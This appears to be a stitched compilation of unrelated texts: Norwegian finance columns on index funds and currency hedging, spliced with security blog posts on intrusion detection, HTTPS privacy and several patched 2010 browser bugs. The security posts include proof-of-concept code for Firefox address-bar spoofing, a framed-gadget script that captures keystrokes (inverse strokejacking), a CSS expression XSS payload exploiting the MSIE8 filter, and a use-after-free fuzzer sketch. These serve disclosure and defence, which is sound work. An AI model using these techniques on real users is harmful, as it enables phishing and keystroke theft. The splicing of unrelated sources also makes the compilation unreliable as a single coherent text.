The real world

This is a piece published in Kapital no. 11, 2010, as a response to a piece in no. 9 by Petter Berge of North Capital.


In a guest column in Kapital no. 9 this year, Petter Berge of North Capital writes that passive management is not a real alternative, because achieving the index's return is not actually possible. In that context, Berge claims that the examples I have presented on my blog - of passive funds beating the index, and of cost-free index funds - are unrepresentative or outright wrong. One should therefore pick active managers, such as North Capital, I presume. As it happens, Berge's claims are mostly wrong, which illustrates the advantages of passive index management rather nicely.

Where I do agree with Berge is that active investors are absolutely necessary to correct prices so that the market can function. There are nevertheless so many of them that virtually all empirical research shows they lose out to index funds. This comes down to one thing - high costs. Before costs, the average active manager actually beats the market, if only barely.

There is therefore no reason for the oil fund or anyone else to worry about there being too few active managers. Taking ethical responsibility for Chinese textile workers is all well and good, but the finance houses on Wall Street will have to fend for themselves as best they can.

Berge then goes on to argue that index management is in reality expensive and difficult. He points out that Vanguard's main fund, which I have used as an example, only mirrors a very liquid part of the American market. The fund is, however, measured against an index representing 99.5% of listed American companies. Berge claims that small companies cannot be index-managed efficiently, but Vanguard has such funds too, and beats the index there as well. Berge claims that Deutsche Bank's (DB) cost-free fund in reality costs 2.5% because DB keeps the dividends for itself, but DB has confirmed to me that this is wrong. Berge's confusion here stems from the fact that investors can choose whether dividends are paid out or reinvested in the fund. Berge dismisses these as two isolated examples, but for the oil fund, investing in Vanguard's funds is a perfectly real alternative. The oil fund would make up only about 25% of Vanguard's total portfolio.

Intrusion detection: doing it wrong

Quite a few thick volumes have been written on the topic of securing corporate environments - but most of them boil down to the following advice:


  1. Reduce your attack surface by eliminating non-essential services and sensibly restricting access to data,
  2. Compartmentalize important services to lower the impact of a compromise,
  3. Keep track of all assets and remediate known vulnerabilities in a timely manner,
  4. Teach people to write secure code and behave responsibly,
  5. Audit these processes regularly to make sure they actually work.


We have an array of practical methodologies and robust tools to achieve these goals - but we also have a pretty good understanding of where this model falls apart. As epitomized by Charlie Miller's goofy catchphrase, "I was not in your threat model", the reason for this is two-fold:



  • You will likely get owned, by kids: reasonably clued people with some time on their hands are (and for the foreseeable future will be) able to put together a fuzzer and find horrible security flaws in most of the common server or desktop software in a matter of days. Modern, large-scale enterprises with vast IT infrastructure, complex usability needs, and a diverse internal user base are always extremely vulnerable to this class of attackers.


    As a feel-good measure, this discussion is often framed in terms of high-profile vulnerability trade, international crime syndicates, or government-sponsored cyberwarfare - but chances are, the harbinger of doom will be a bored teenager, or a geek with an outlandish agenda; they are less predictable than foreign governments, too - so in some ways, we should be fearing them more.

  • Compartmentalization will not save you: determined attackers will take their time, and will get creative if needs be. Compartmentalization may buy a couple of days, but simply can't be designed to keep them away forever, yet keep the business thriving: as witnessed by a number of well-publicized security incidents, design compromises and poor user judgment inevitably create escalation paths.



Past a certain point, proactive measures begin to offer diminishing returns: throwing money at the problem will probably never get you to a point where a compromise is unlikely, and the business can go on. This is not a cheering prospect - but something we have to live with.


The key to surviving a compromise may lie in the capability to detect a successful attack very early on. The attackers you should be fearing the most are just humans, and have to learn about the intricacies of your networks, and the value of every asset, as they go. These precious hours may give you the opportunity to recover - right before an incident becomes a disaster.


This brings us to the topic of intrusion detection - a surprisingly hard and hairy challenge in the world of information security. Most of the detection techniques at our disposal today are inherently bypassable; this is particularly true for the bulk of the tricks employed by most of the commercial AV, IDS, IPS, and WAF systems I know of. And that's where the problem lies: because the internals of these tools are essentially public knowledge, off-the-shelf intrusion detection systems often amount to a fairly expensive (and often itself vulnerable!) tool to deter only the dumbest of attackers. A competent adversary, prepared in advance or simply catching the scent of a specific IDS toolkit, is reasonably likely to work around it without breaking a sweat.


The interesting - and highly contentious - question is what happens when the design of your in-house intrusion detection system becomes a secret. Many of my peers would argue this is actually harmful: in most contexts, security-by-obscurity does nothing to correct the underlying problems, and merely sweeps them under the rug. Yet, I am inclined to argue that in this particular case, it offers a qualitative difference. Here's why:


Let's begin by proposing a single, trivial anomaly detection rule, custom-tailored for our operating environment (and therefore reasonably sensitive and unlikely to generate false positives); for example, it could be a simple daemon that takes notice of execve() calls with stdin pointing directly to a network socket - a common sign of server-targeted shellcode. When the architecture is not shared with common commercial tools, external attackers stand a certain chance of tripping this check, and a certain chance of evading it - but this is governed almost solely by dumb luck, and not by their skill. The odds are not particularly reassuring, but they are a starting point.
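
As a very rough sketch of what such a daemon could look like - my illustration, not a production tool; a real implementation would hook execve() through the kernel's auditing facilities rather than poll, needs enough privileges to inspect other users' processes, and would whitelist inetd-style services that legitimately inherit a socket on stdin:

// Toy Linux check (Node.js): flag processes whose stdin (fd 0) is a socket.
var fs = require('fs');

function scanOnce() {
  fs.readdirSync('/proc').filter(function(d) { return /^\d+$/.test(d); })
    .forEach(function(pid) {
      try {
        var target = fs.readlinkSync('/proc/' + pid + '/fd/0');
        var comm = fs.readFileSync('/proc/' + pid + '/comm', 'utf8').trim();
        if (target.indexOf('socket:') === 0)
          console.warn('ALERT: pid ' + pid + ' (' + comm + ') has stdin on ' + target);
      } catch (e) { /* process went away mid-scan - ignore */ }
    });
}

setInterval(scanOnce, 1000);  // crude polling; a real daemon would hook execve()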


(Now, an insider stands a better chance of defeating the mechanism - an unavoidable if less common problem - but a rogue IT employee is an issue that, for all intents and purposes, defies all attempts to solve it with technology alone.)


Let's continue further down this road: perhaps also introduce a simple tool to identify unexpected interactive sessions within encrypted and non-encrypted network traffic; or even a tweaked version of /bin/sh that alerts us to unusual -c or stdin payloads. Building on top of this, we can proceed to business logic: say, checks for database queries matching unusual patterns, or coming from workstations belonging to users not usually engaged in customer support. Each of these checks is trivial, and stands only an average chance of detecting a clued attacker. Yet, as the chain of tools grows longer, and the number of variables that need to be guessed perfectly right increases, the likelihood of evading detection - especially early in the process - becomes extremely low. Simplifying a bit, the odds of strolling past ten completely independent, 50% reliable checks are just 1 in 1024; it does not matter whether the attacker is the best hacker in the world or not (unless also a clairvoyant).
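
(For the curious, the toy model behind that number - assuming, a bit optimistically, fully independent checks:)

// Odds of slipping past n independent checks, each detecting with probability p.
var evadeOdds = function(n, p) { return Math.pow(1 - p, n); };
console.log(evadeOdds(10, 0.5));   // 0.0009765625 - i.e., 1 in 1024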


For better or worse, intrusion detection seems to be an essential survival skill - and I think we are all too often doing it wrong. A successful approach hinges on the uniqueness and diversity - and not necessarily the complexity - of the tools used; the moment you neatly package them and share the product with the world, your IDS becomes a $250,000 novelty toy.


Sadly, large organizations often lack the expertise, or just the courage, to get creative. There is a stigma of low expectations attached to intrusion detection in general, to security-by-obscurity as a defense strategy, and to maintaining in-house code that can't generate pie charts on a quarterly basis.


But when you are a high-profile target, defending only against the dumb attackers in a world full of brilliant ones - some of them driven by peculiar and unpredictable incentives - strikes me as a poor approach in the long run.

Yeah, about that address bar thing...

As promised, here's another interesting browser bug, showing the perils of being user-friendly.


You are probably familiar with the usual behavior of the address bar: when you click on a link, the browser keeps showing the old location up until the new content is retrieved and actually replaces the previous page. Only Safari behaves differently, always showing the new destination - which I think can be deceptive:


<input type=submit value="Click me!" onclick="clicked()">
<script>
function clicked() {
  // Open a blank window and inject our own content into it...
  var w = window.open("", "_blank");
  w.document.body.innerHTML = "Where do I come from?";
  // ...then navigate away: Safari shows the new URL right away,
  // while our injected markup is still on the screen.
  w.location = 'http://1.2.3.4/';
}
</script>

I don't like this behavior, but it perhaps does not constitute an outright security flaw: the spinning throbber is a weak but visible indicator of foul play.


But to the point! If you look carefully at the remaining browsers, you may also notice a curious exception to the rule: when a link is opened in a new window or a tab, most browsers will put the destination URL in the address bar right away. Why? Apparently, usability is the reason: doing this seemed more user-friendly than showing about:blank for a couple of seconds.


Alas, this design decision creates an interesting vulnerability in Firefox: the about:blank document actually displayed in that window while the page is loading is considered same origin with the opener; the attacker can inject any content there - and still keep his made-up URL in the address bar.


Well, the spinning throbber is there, right? As it turns out, you can make it go away. The harder way is to use a URL that legitimately returns HTTP 204; the easier way is to simply call window.stop():



<input type=submit value="Click me!" onclick="clicked()">
<script>
var w;
function clicked() {
  // Open the destination so the browser puts its URL in the address bar
  // right away, before any content is actually retrieved.
  w = window.open("http://1.2.3.4/", "_blank", "toolbar=1,menubar=1");
  // The window still shows an about:blank document that is same origin
  // with us: inject fake content, then stop the load so the throbber
  // disappears and the spoofed URL sticks around.
  setTimeout('w.document.body.innerHTML = "Fake content!"; w.stop();', 500);
}
</script>


Reported in early April as CVE-2010-1206; Mozilla addressed the glitch in release 3.6.7.

HTTPS is not a very good privacy tool

Today, EFF announced HTTPS Everywhere - a browser plugin that automatically "upgrades" all requests to a set of predefined websites, such as Wikipedia, to HTTPS. This is done in a manner similar to Strict Transport Security.


Widespread adoption of encryption should be praised - but the privacy benefits of tools like this are often misunderstood. The protocol is engineered to maintain the confidentiality and integrity of a priori private data exchanged over the wire - and does very little to keep your actions private when accessing public content.


Even with HTTPS, every passive, unsophisticated attacker should be able to tell exactly which Wikipedia page you happen to be interested in: looking at packet sizes, direction, and timing patterns for encrypted HTTP requests, he can identify the resource with a high degree of confidence. With that particular site, you do not even need to crawl the content on your own: database dumps are provided by the foundation, and take a couple of hours to download over DSL.
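
A toy illustration of the principle - the page titles are real, but the byte counts are invented for the sake of the example:

// Match an observed (encrypted) response length against a precomputed catalog
// of page sizes; TLS adds little size noise, so a small tolerance suffices.
var pageSizes = {                       // hypothetical byte counts
  'Tor_(network)': 48213,
  'HTTPS': 51877,
  'Plausible_deniability': 23402
};

function guessPage(observedLen, tolerance) {
  return Object.keys(pageSizes).filter(function(p) {
    return Math.abs(pageSizes[p] - observedLen) <= (tolerance || 64);
  });
}

console.log(guessPage(51900));          // [ 'HTTPS' ]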


Adding some random padding and jitter to the communications will help, but can be only taken so far without introducing a very significant performance penalty. Because of this, large-scale behavioral analysis is still likely to be very effective even if we do some of that.


Naturally, there are situations where HTTPS actually helps with privacy; but fewer than we have probably come to expect. Even the contents of encrypted text typed in by the user can be reconstructed in some fascinating cases, as explored in this research paper from Microsoft.

Browser-side XSS detectors of doom

The prevalence of cross-site scripting - an unfortunate consequence of how the web currently operates - is one of the great unsolved challenges in the world of information security. Short of redesigning HTML from scratch, browser developers are not particularly well-positioned to fix this issue; but understandably, they are eager to at least mitigate the risk.


One of the most publicized efforts along these lines is the concept of browser-side, reflected XSS detectors: the two most notable implementations are David Ross' XSS filter (shipping in Internet Explorer 8) and Adam Barth's XSS Auditor (WebKit browsers - currently in Safari 5). The idea behind these tools is very simple: if query parameters seen in the request look suspiciously close to any "active" portions of the rendered page, the browser should assume foul play - and step in to protect the user.


Naturally, nothing is that simple in the browser world. The major design obstacle is that the check has to be passive - active probes are likely to cause persistent side effects on the server. Because of this, the detector can merely look for correlation, but not confirm causation; try this or this search in Internet Explorer 8 to see a canonical example of why this distinction matters.


Since passive checks inevitably cause false positives, the authors of these implementations defaulted to a non-disruptive "soft fail" mode: when a suspicious pattern is detected, the browser will still attempt to render the page - just with the naughty bits selectively removed or defanged in some way.


While a fair number of issues with XSS detectors have been pointed out in the past - from hairy implementation flaws to trivial bypass scenarios - the "soft fail" design creates some more deeply rooted problems that may affect the safety of the web in the long run. Perhaps the most striking example is this snippet, taken from a real-world website:


<script>
...
// Safari puts <style> tags into new <head> elements, so
// let's account for this here.
...
</script>
...
[ sanitized attacker-controlled data goes here ]


The data displayed there is properly escaped; under normal circumstances, this page is perfectly safe. But now, consider what happens if the attacker-controlled string is } body { color: expression(alert(1)) } - and ?q=<script> is appended at the end of the URL. The filter employed in MSIE8 will neutralize the initial <script>, resulting in the <style> tag inside the JavaScript comment being interpreted literally - putting the browser in a special parsing mode. This, in turn, causes the somewhat perverted CSS parser to skip any leading and trailing text, and interpret the attacker-controlled string as a JavaScript expression buried in a stylesheet.
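
To make the failure mode concrete, here is roughly what the neutered page looks like to the HTML parser afterwards (my reconstruction; the exact character the filter substitutes may differ):

<sc#ipt>                              <!-- defanged: no script context is opened -->
...
// Safari puts <style> tags into new <head> elements, so
// let's account for this here.
...
</script>
...
} body { color: expression(alert(1)) }

With the opening tag neutered, the <style> string inside the former JavaScript comment becomes a genuine markup tag, and everything down to the attacker-controlled string is suddenly parsed as a stylesheet.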


Eep. This particular case should be fixed by the June security update, but the principle seems dicey.


The risk of snafus like this aside, the fundamental problem with XSS detectors is that, quite simply, client-side JavaScript is increasingly depended upon to implement security-critical features. The merits of doing so may be contested by purists, but it's where the web is headed. No real alternatives exist, either: a growing number of applications use servers merely as a dumb, ACL-enforcing storage backend, with everything else implemented on the client side; mechanisms such as localStorage and widget manifests actually remove the server component altogether.


To this client-heavy architecture, XSS detectors pose an inherent threat: they make it possible for third-party attackers to selectively tamper with the execution of the client-side code, and cause the application to end up in an unexpected, inconsistent state. Disabling clickjacking defenses is the most prosaic example; but more profound attacks against critical initialization or control routines are certainly possible, and I believe they will happen in the future.


The skeptic in me is not entirely convinced that XSS filters will ever be robust and reliable enough to offset the risks they create - but I might be wrong; time will tell. Until this is settled, several other people and I have pleaded for an opt-in strict filtering mode that prevents the page from being rendered at all when a suspicious pattern is detected. Now that it is available, enabling it on your site is probably a good idea.
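
For reference, opting in takes a single response header, honored by MSIE 8 and recent WebKit builds:

X-XSS-Protection: 1; mode=block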

The curse of inverse strokejacking

This is the third interesting bug I had in my pipeline for a while. It's far less scary than the previous ones, but nevertheless, probably amusing enough.


A while ago, I posted a whimsical proof of concept for what I greatly enjoy calling strokejacking. The problem amounts to this: a rogue site can put an unrelated, third-party web application in a hidden frame - and then, by offering some seemingly legitimate functionality, entice the user to type in a body of text. As the user is typing, the attacker is free to examine key codes from within the onkeydown handler - and when desired, momentarily move focus to said hidden frame, causing the actual onkeypress event to be routed there instead. The trick essentially permits arbitrary, attacker-controlled input to be synthesized on the targeted site - possibly changing the victim's privacy settings, setting up mail forwarding, or authorizing new users to access personal data.
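
A bare-bones sketch of the mechanics - the victim URL and the characters being synthesized are placeholders, and the original proof of concept is considerably more polished:

<iframe id="victim" src="http://victim.example/settings" style="opacity: 0"></iframe>
<textarea id="decoy" rows="10" cols="60"></textarea>
<script>
var wanted = 'evil'.split('');          // keystrokes to route to the frame
var decoy = document.getElementById('decoy');
decoy.onkeydown = function(e) {
  // Peek at the key before keypress fires; if it's the next character we
  // need, flip focus so the actual keypress lands in the hidden frame.
  if (wanted.length &&
      String.fromCharCode(e.keyCode).toLowerCase() === wanted[0]) {
    wanted.shift();
    document.getElementById('victim').contentWindow.focus();
    setTimeout(function() { decoy.focus(); }, 0);   // grab focus back
  }
};
</script>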


The attack is arguably more interesting than your traditional, run-of-the-mill clickjacking, mostly because it allows for more complex interactions. Still, in most cases, it can be prevented the same way - with X-Frame-Options or with framebusting JavaScript - so no reason to panic, right?


Well, there's a twist: shortly after reporting this problem publicly several months ago, I realized that the attack scenario could be reversed. Consider a third-party gadget or an advertisement framed on a legitimate page, a pretty common pattern today. The frame is free to grab focus from the top-level document, as this operation is not governed by the same-origin policy. Normally, this causes the caret to disappear from where the user is expecting it to be - but by briefly giving up focus at strategically timed intervals, the appearance of a blinking cursor in the top-level document can be maintained. The rogue gadget can then read all the typed characters via onkeydown - and have onkeypress delivered to the top-level document, so that everything seems to be working as expected - with an extra copy of all the data silently delivered to the attacker.
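
From the gadget's side, the inverse variant boils down to something like this - a rough sketch; the timing needed to keep the caret illusion convincing takes more care (see the proof of concept linked below):

<script>
var stolen = '';
window.onkeydown = function(e) {
  stolen += String.fromCharCode(e.keyCode);       // record the key...
  parent.focus();                                 // ...let keypress go upstairs,
  setTimeout(function() { window.focus(); }, 0);  // then steal focus right back
};
window.focus();                                   // grab focus to begin with
</script>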


A simple WebKit-specific proof of concept can be found here. The usual clickjacking defenses are not applicable in this scenario, for obvious reasons.


WebKit bug: 26824. Firefox bug: 552255. CVE-2010-1422.

Announcing ref_fuzz, a 2 year old fuzzer

Somewhere in 2008, I created a relatively simple DOM binding fuzzer dubbed ref_fuzz. The tool attempted to crawl the DOM object hierarchy from a particular starting point, collect object references discovered during the crawl by recursively calling methods and examining properties, and then reuse them in various ways after destroying the original object. In essence, the goal was to find use-after-free conditions across the browser codebase.
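
A greatly simplified sketch of the core loop - the real tool is considerably more thorough about what it calls, what it collects, and how it destroys things:

var refs = [];

function crawl(obj, depth) {
  if (depth > 2 || obj === null || typeof obj !== 'object') return;
  for (var name in obj) {
    try {
      var val = obj[name];
      refs.push(val);                  // hold on to the reference for later
      crawl(val, depth + 1);
    } catch (e) { /* some properties throw on access - ignore */ }
  }
}

var w = window.open('about:blank');
w.document.body.innerHTML = '<div><input><iframe></iframe></div>';
crawl(w.document.body, 0);
w.close();                             // destroy the original objects...

for (var i = 0; i < refs.length; i++) {
  try { refs[i].nodeName; refs[i].toString(); }   // ...then poke the stale refs
  catch (e) { /* exceptions are fine - crashes are what we are after */ }
}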


The fuzzer managed to crash all the mainstream browsers on the market at that time, in a number of seemingly exploitable ways. Early fixes from Opera and Apple started shipping somewhere in 2008; some more arrived in 2009. Today, Microsoft released a fix and a bulletin for CVE-2010-1259 (MS10-035), while Apple released fixes for CVE-2010-1119 - fixing the last of the scary memory corruption cases attributed to the tool.


The story of ref_fuzz is interesting, because to some extent, it illustrates the shortcomings of one-way responsible disclosure. Had I released this fuzzer publicly in 2008, it would probably have caused some short-term distress - but in the end, vendor response would likely have been swift, out of simple necessity; this certainly proved to be the case with mangleme, a comparably effective fuzzer I developed in 2004.


In this particular case, however, the appropriate parties were notified privately, with no specific disclosure deadline given. This, coupled with the inability to create simple repro cases (an inherent consequence of the fuzzer's design), likely prompted the developers to deprioritize investigating and responding to these flaws - in the end, taking months or years instead of days or weeks. Given that they need to respond to hundreds or thousands of seemingly more urgent bugs every year, this is not unexpected.


What's more troubling is that, within that timeframe, many of the crashes triggered by ref_fuzz were independently rediscovered and fixed: several exploitable crashes were patched without attribution by Microsoft in December 2009 (MSRC cases 9480jr and 9501jr); similarly, several WebKit flaws were rediscovered by Alexey Proskuryakov and addressed in WebKit earlier this year (say, bug 33729), and by Pwn2Own winners shortly thereafter. Is it unreasonable to assume that malicious researchers were just as likely to spot these glitches on their own?


In any case - I am happy to finally release the tool today. You can check out the fuzzer here (warning: clicking on this link may cause your browser to misbehave).

Safari: a tale of betrayal and revenge

Looks like I am finally free to discuss the first interesting browser bug on my list - so here we go. I really like this one: its history goes back to 1994, and spans several very different codebases. The following account is speculative, but probably a pretty good approximation of what went wrong.


Let's begin with this simple URL:


http:example.com/


This syntax demonstrates an unintentional and completely impractical quirk in the URL parsing algorithm specified some 16 years ago in RFC 1630. Verbatim implementations are bound to parse this string as a relative reference to protocol = 'http', host = $base_url.host, path = 'example.com/'. It does not make a whole lot of sense, and indeed, in RFC 3986, Tim Berners-Lee had this to say:


"This is considered to be a loophole in prior specifications of partial URI [RFC1630]. Its use should be avoided but is allowed for backward compatibility."


Fast forward two years: the KDE team is working on a new open-source browser, Konqueror. Their browser uses KURL as the canonical URL parsing library across the codebase. This parser behaves in an RFC-compliant way when handling our weird input string, with one seemingly unimportant difference: if the current parsing context does not have a valid host name associated with it, the address is not rejected as unresolvable; the host name is simply set to an empty string. No big deal, right?


Well, somewhere around 2002, the renderer and the JavaScript engine used in Konqueror - KHTML and KJS - are forked off under the name of WebKit, and become the foundation for Safari. The fork contains almost all the necessary core components for a browser, with the notable exception of a built-in HTTP stack - and so, Apple decides to reuse their existing CFNetwork library for this purpose. When our special URL finally makes it to this library, it is interpreted in a far more intuitive, but technically less correct way - as protocol = 'http', host = 'example.com', path = '/'; HTTP cookies and other request parameters are then supplied accordingly.
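
To put the two interpretations side by side (and to check what your own browser's DOM code does with the string):

// KURL (used for same-origin checks):
//   scheme = 'http', host = '' (empty!), path = 'example.com/'
// CFNetwork (used for the actual HTTP traffic):
//   scheme = 'http', host = 'example.com', path = '/'

var a = document.createElement('a');
a.href = 'http:example.com/';
console.log(a.protocol, a.host, a.pathname);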


The result? When you open two windows in Safari - one pointing to http:hairy-spiders.com, and the other pointing to http:fuzzy-bunnies.com - the HTTP stack will make sure they are populated with cookie-authenticated data coming from the two different servers named in the URLs; but the same origin checks within the browser will rely on KURL instead. Remember how KURL spews out an empty host name in both cases? Because empty strings always match, both pages are deemed to be coming from the same source, and can access each other at will. Oops.


Well, there's still a catch: this attack will only work as expected if the windows are opened by hand; in documents opened from a web page, the host name from the base URL will interfere with how the URLs are broken down. Thankfully, we can work around it, simply by hopping through a data: URL.


Reported to the vendor in January 2010, fixed in Safari 4.1 and 5.0 (APPLE-SA-2010-06-07-1, CVE-2010-0544). A simple and harmless proof-of-concept can be found here.

Hedging and gambling

There is a fine line between hedging and speculating. Keeping things simple, and keeping a cool head, makes all the difference.

A fixed-rate agreement is an example of what we call hedging. A fixed rate makes future interest expenses more predictable. What many people do not know is that such an agreement can be exited before it expires. If rates have risen, as they have recently, this can mean a tidy sum of cash deposited to your account. Locking in gains this way is, however, an active bet on the market - or speculation, as it is also called.

Take Norwegian, for example. According to Bjørn Kjos, the airline hedged against a rise in the oil price in 2007, but not in 2008, because it did not believe in further increases. What started out as a hedging strategy thereby changed character into pure speculation on the oil price. The result was that Norwegian ran into serious trouble when the oil price stayed extremely high for a few months, until the financial crisis and the oil price collapse rescued the bet. Things thus did not end too badly, but abandoning an existing hedging strategy was in reality a bet against the market that the oil price would fall.

Ideally, companies should lock in the future price they will obtain in the market at the moment the production decision is made. An exporter, for example, is highly exposed to fluctuations in the exchange rate. The decision on how much to produce is typically made long before anything is known about the price of the euro. A simple solution is to enter into a contract to exchange at a fixed rate in the future. In this way, all currency risk disappears at delivery, and the company can concentrate on what it does best.

Strangely enough, this is not standard procedure at every Norwegian export company. Instead, banks sometimes offer options as protection against currency fluctuations. These options mean that the company is protected on the downside but keeps an unlimited upside. This sounds perfectly reasonable. When the euro falls, the option compensates the company for its loss. When it rises, the company gets a better rate and a pure profit. What is not so obvious to most people is that such options are in reality an instrument of speculation, not of hedging.

To explain why, imagine a sales department that agrees on a future price for the euro, thereby eliminating all currency risk. It does not get any safer than that. At the same time, and unaware of the sales department's clever hedging strategy, the CEO goes out and buys an option that pays out when the euro rises. Since the option purchase is unrelated to the hedge, it is hard to characterize the CEO's move as anything but pure speculation. The option naturally has a large upside, but it also has a cost. If the CEO's bet does not pay off, he loses the entire investment. The net result for the company is nevertheless identical to an option that protects the downside.
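
The equivalence is just put-call parity. As a minimal sketch - premiums and discounting ignored, with the strike $K$ set equal to the forward rate $F$, and $S_T$ denoting the euro rate at expiry:

$$\underbrace{F + \max(S_T - K,\,0)}_{\text{forward hedge}\;+\;\text{the CEO's call}} \;=\; \underbrace{S_T + \max(K - S_T,\,0)}_{\text{unhedged sale}\;+\;\text{downside put}}$$

If the euro ends above $K$, both sides pay $S_T$; if it ends below, both pay $F = K$. The "downside protection" the bank sells is thus just the fixed-price hedge plus a speculative call, bundled so that the bet is harder to see.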

This illustrates why such options are unsuitable as hedging tools. A company that chooses downside protection is in reality speculating that the euro will move in its favor. The company's counterparties are large multinational financial institutions with enormous resources for analyzing mispricing in the currency market. Guess who wins in the long run?

Many may feel that this option-based hedging sounds a little complicated. Not DnB Nor, which according to DN sold some even more complicated hedging products to stockfish exporters in Lofoten in February this year. The product sold was a downside option, but the interesting twist was that if the euro moved in the exporters' favor, they would earn twice what the currency move implied. In our example, that corresponds to the CEO doubling his stake!

Options do not come free, however. They have to be paid for one way or another. For the stockfish exporters, the price was that the entire currency hedge vanished if the euro rose above a certain level. The exporters had in effect bought fire insurance that was void if the house burned down.

The simplest way to avoid this type of mistake is to maintain a clear separation between hedging and speculation. The hedge itself should take the form of a fixed-price agreement, or an instrument producing the equivalent cash flow. If you then wish to speculate in the market with options, or bet on a fall in the oil price, you do so on a separate budget. That makes it much easier to see that such positions in reality increase risk rather than reduce it.